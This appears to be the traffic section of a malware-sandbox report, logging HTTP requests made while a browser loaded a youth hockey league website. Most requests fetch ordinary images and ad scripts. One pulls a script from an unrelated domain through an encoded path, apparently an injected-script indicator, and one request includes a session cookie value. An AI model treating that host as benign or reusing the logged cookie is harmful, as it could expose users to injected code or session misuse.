Source: global trafficHTTP traffic detected: GET /app/uploads/gthl/2024/08/29093926/icons8-rss-48-1.png HTTP/1.1Host: d2pr6pnwfmh0za.cloudfront.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /app/uploads/gthl/2024/12/20145510/U10-A-Applewood-Coyotes-GTHL-Community-730x411.jpg HTTP/1.1Host: d2pr6pnwfmh0za.cloudfront.netConnection: keep-alivesec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://gthlcanada.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /app/uploads/gthl/2024/12/17102800/Player-Movement-Website-Graphic-730x410.jpg HTTP/1.1Host: d2pr6pnwfmh0za.cloudfront.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pagead/managed/js/gpt/m202501070101/pubads_impl.js HTTP/1.1Host: securepubads.g.doubleclick.netConnection: keep-alivesec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CI+2yQEIorbJAQipncoBCMD2ygEIlKHLAQic/swBCIWgzQEI1r3OARjBy8wBSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://gthlcanada.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /app/uploads/gthl/2024/12/19132310/33-waiting-for-the-pass-e1734632610661-730x427.jpg HTTP/1.1Host: d2pr6pnwfmh0za.cloudfront.netConnection: keep-alivesec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://gthlcanada.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /app/uploads/gthl/2022/10/26123500/400X350-SAFE-SPORT-COMPLAINT-PROCESS-EN-320x280.jpg HTTP/1.1Host: d2pr6pnwfmh0za.cloudfront.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /app/uploads/gthl/2024/12/12194650/U10-AA-West-Mall-Lightning-GTHL-Community-2-730x411.jpg HTTP/1.1Host: d2pr6pnwfmh0za.cloudfront.netConnection: keep-alivesec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://gthlcanada.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /app/uploads/gthl/2023/06/10112443/Nothers-Big-Box.jpeg HTTP/1.1Host: d2pr6pnwfmh0za.cloudfront.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /app/uploads/gthl/2022/11/22115759/IMG_6412-e1729706741707-730x420.jpg HTTP/1.1Host: d2pr6pnwfmh0za.cloudfront.netConnection: keep-alivesec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://gthlcanada.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /app/uploads/gthl/2023/05/02161525/START-HOCKEY-1080x1080-Start-Somewhere-320x320.jpg HTTP/1.1Host: d2pr6pnwfmh0za.cloudfront.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /app/uploads/gthl/2024/10/10123452/IMG_7761-e1728578153211-730x380.jpg HTTP/1.1Host: d2pr6pnwfmh0za.cloudfront.netConnection: keep-alivesec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://gthlcanada.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /app/uploads/gthl/2024/11/13195651/HHOF23_ShootSaveCall_300x250.gif HTTP/1.1Host: d2pr6pnwfmh0za.cloudfront.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /recaptcha/api2/anchor?ar=1&k=6LfHrSkUAAAAAPnKk5cT6JuKlKPzbwyTYuO8--Vr&co=aHR0cHM6Ly9ndGhsY2FuYWRhLmNvbTo0NDM.&hl=en&v=zIriijn3uj5Vpknvt_LnfNbF&size=invisible&cb=s7x76yuho1vi HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CI+2yQEIorbJAQipncoBCMD2ygEIlKHLAQic/swBCIWgzQEI1r3OARjBy8wBSec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://gthlcanada.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: NID=517=i4E8sm-BN75bnGkPw4VW8uy51aQ8ounjntfNX2fu8MFJNuIvCX0dRBy-XkHqHwKOVFSSaC2nqfULsnHhY3TzIXHWC90jS3Wi2BINtQIDr1LJvZE4Ud-byTNL9Q04Nd1-ydmJvrWYY5vORspW6soJ1bMj20dq8UvPjgkw2sOvmuTUanqu
Source: global trafficHTTP traffic detected: GET /app/uploads/gthl/2024/12/19132310/33-waiting-for-the-pass-e1734632610661-730x427.jpg HTTP/1.1Host: d2pr6pnwfmh0za.cloudfront.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /app/uploads/gthl/2024/10/10101535/2024-World-Mental-Health-Day-Challenge-1600x900-730x411.jpg HTTP/1.1Host: d2pr6pnwfmh0za.cloudfront.netConnection: keep-alivesec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://gthlcanada.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /app/uploads/gthl/2024/01/09095632/Big-box-ad-creative-300x25012.jpg HTTP/1.1Host: d2pr6pnwfmh0za.cloudfront.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /app/uploads/gthl/2022/11/17161524/IMG_9525-e1734465590754-730x437.jpg HTTP/1.1Host: d2pr6pnwfmh0za.cloudfront.netConnection: keep-alivesec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://gthlcanada.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /app/uploads/gthl/2024/12/09110126/Broidy-Rondelet-Beyond-the-Whistle-730x411.jpg HTTP/1.1Host: d2pr6pnwfmh0za.cloudfront.netConnection: keep-alivesec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://gthlcanada.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /app/uploads/gthl/2022/11/22115759/IMG_6412-e1729706741707-730x420.jpg HTTP/1.1Host: d2pr6pnwfmh0za.cloudfront.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /app/uploads/gthl/2024/12/12194650/U10-AA-West-Mall-Lightning-GTHL-Community-2-730x411.jpg HTTP/1.1Host: d2pr6pnwfmh0za.cloudfront.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /app/uploads/gthl/2024/12/20173705/Spengler-Cup-Hockey-Canada-730x406.jpg HTTP/1.1Host: d2pr6pnwfmh0za.cloudfront.netConnection: keep-alivesec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://gthlcanada.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /app/uploads/gthl/2024/10/10123452/IMG_7761-e1728578153211-730x380.jpg HTTP/1.1Host: d2pr6pnwfmh0za.cloudfront.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /app/uploads/gthl/2024/12/16114804/Screenshot-2024-12-16-at-11.47.53-AM-730x408.jpg HTTP/1.1Host: d2pr6pnwfmh0za.cloudfront.netConnection: keep-alivesec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://gthlcanada.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /app/uploads/gthl/2024/12/10213839/Screenshot-2024-12-10-at-9.32.59-PM-730x410.jpg HTTP/1.1Host: d2pr6pnwfmh0za.cloudfront.netConnection: keep-alivesec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://gthlcanada.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /app/uploads/gthl/2024/12/20145510/U10-A-Applewood-Coyotes-GTHL-Community-730x411.jpg HTTP/1.1Host: d2pr6pnwfmh0za.cloudfront.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pagead/managed/js/gpt/m202501070101/pubads_impl.js HTTP/1.1Host: securepubads.g.doubleclick.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI+2yQEIorbJAQipncoBCMD2ygEIlKHLAQic/swBCIWgzQEI1r3OARjBy8wBSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /SzlpnTAbCvQvG1OvfQpFvzkbU78xQAX7O1sfvzY= HTTP/1.1Host: virtual.urban-orthodontics.comConnection: keep-alivesec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://gthlcanada.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /app/uploads/gthl/2024/09/18145918/Game-Day-Meals-for-the-Season-1600x900-2-730x411.jpg HTTP/1.1Host: d2pr6pnwfmh0za.cloudfront.netConnection: keep-alivesec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://gthlcanada.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /app/uploads/gthl/2024/10/10101535/2024-World-Mental-Health-Day-Challenge-1600x900-730x411.jpg HTTP/1.1Host: d2pr6pnwfmh0za.cloudfront.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /app/uploads/gthl/2023/07/13145939/5HealthySnacks-1024x512jpg-730x365.jpg HTTP/1.1Host: d2pr6pnwfmh0za.cloudfront.netConnection: keep-alivesec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://gthlcanada.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /app/uploads/gthl/2022/11/17161524/IMG_9525-e1734465590754-730x437.jpg HTTP/1.1Host: d2pr6pnwfmh0za.cloudfront.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /app/uploads/gthl/2024/12/09110126/Broidy-Rondelet-Beyond-the-Whistle-730x411.jpg HTTP/1.1Host: d2pr6pnwfmh0za.cloudfront.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /app/uploads/gthl/2022/10/31124110/SnacksToFuelPerformance-BreakoutFall2022-730x355.jpg HTTP/1.1Host: d2pr6pnwfmh0za.cloudfront.netConnection: keep-alivesec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://gthlcanada.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /app/uploads/gthl/2024/12/10213839/Screenshot-2024-12-10-at-9.32.59-PM-730x410.jpg HTTP/1.1Host: d2pr6pnwfmh0za.cloudfront.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /app/uploads/gthl/2023/08/31160426/Screen-Shot-2023-08-31-at-4.03.51-PM-e1693512300199-730x640.png HTTP/1.1Host: d2pr6pnwfmh0za.cloudfront.netConnection: keep-alivesec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://gthlcanada.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /app/uploads/gthl/2023/06/26135230/GTHL-PrideParade2023-730x548.jpeg HTTP/1.1Host: d2pr6pnwfmh0za.cloudfront.netConnection: keep-alivesec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://gthlcanada.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /app/uploads/gthl/2024/12/20173705/Spengler-Cup-Hockey-Canada-730x406.jpg HTTP/1.1Host: d2pr6pnwfmh0za.cloudfront.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /app/uploads/gthl/2021/07/17001307/GTHLLOGO-WEB-730x365.jpg HTTP/1.1Host: d2pr6pnwfmh0za.cloudfront.netConnection: keep-alivesec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://gthlcanada.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /app/uploads/gthl/2024/12/16114804/Screenshot-2024-12-16-at-11.47.53-AM-730x408.jpg HTTP/1.1Host: d2pr6pnwfmh0za.cloudfront.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /app/uploads/gthl/2025/01/02154916/AROUND-THE-G-TITLE-January-2025-2-730x411.jpg HTTP/1.1Host: d2pr6pnwfmh0za.cloudfront.netConnection: keep-alivesec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://gthlcanada.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /app/uploads/gthl/2024/09/18145918/Game-Day-Meals-for-the-Season-1600x900-2-730x411.jpg HTTP/1.1Host: d2pr6pnwfmh0za.cloudfront.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /app/uploads/gthl/2024/12/02164945/AROUND-THE-G-TITLE-November-2024-730x411.jpg HTTP/1.1Host: d2pr6pnwfmh0za.cloudfront.netConnection: keep-alivesec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://gthlcanada.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
